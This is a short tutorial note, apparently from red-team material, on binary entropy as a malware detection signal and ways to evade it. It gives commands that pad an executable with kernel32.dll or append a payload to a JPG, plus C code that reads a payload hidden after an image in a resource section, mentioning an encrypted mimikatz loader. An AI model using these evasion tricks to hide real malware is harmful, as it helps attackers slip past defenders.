Binary entropy is a concept used in information theory to measure the randomness or uncertainty of a binary sequence. In the context of detecting malware, binary entropy can be used to analyze the characteristics of a binary file and determine whether it exhibits suspicious or malicious behavior.

Looking the entropy the encrypted payload can be easily detected.

We can see the binary entropy of a file with Helenium Hex Editor software.

As an example here we can see a basic loader that has mimikatz encrypted.

There are some tricks to bypass entropy defensive measures.

• Concatenate a legitimate dll.

type c:\Windows\System32\kernel32.dll >> bin.exe

• Use a image and load it from resources.

type payload.bin >> a.jpg

Note: We need to know the original size of the image.

Example of loading the payload appended to an image from .rsrc section.

#include <Windows.h>
#include "resources.h"
#include <stdio.h>

#define IMAGE_LEN  196676 //len in bytes of the original image

int main(int argc, char ** argv) {

    PVOID lpAddress;
    SIZE_T sDataSize;
    HGLOBAL resHandle = NULL;
	HRSRC res;

    //Read Payload from favicon.ico
    unsigned char * payload;
	unsigned int payload_len;
    res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);
	resHandle = LoadResource(NULL, res);
	payload = (unsigned char *) LockResource(resHandle) + IMAGE_LEN;
	payload_len = SizeofResource(NULL, res) - IMAGE_LEN;
    sDataSize = payload_len;

    return 0;
}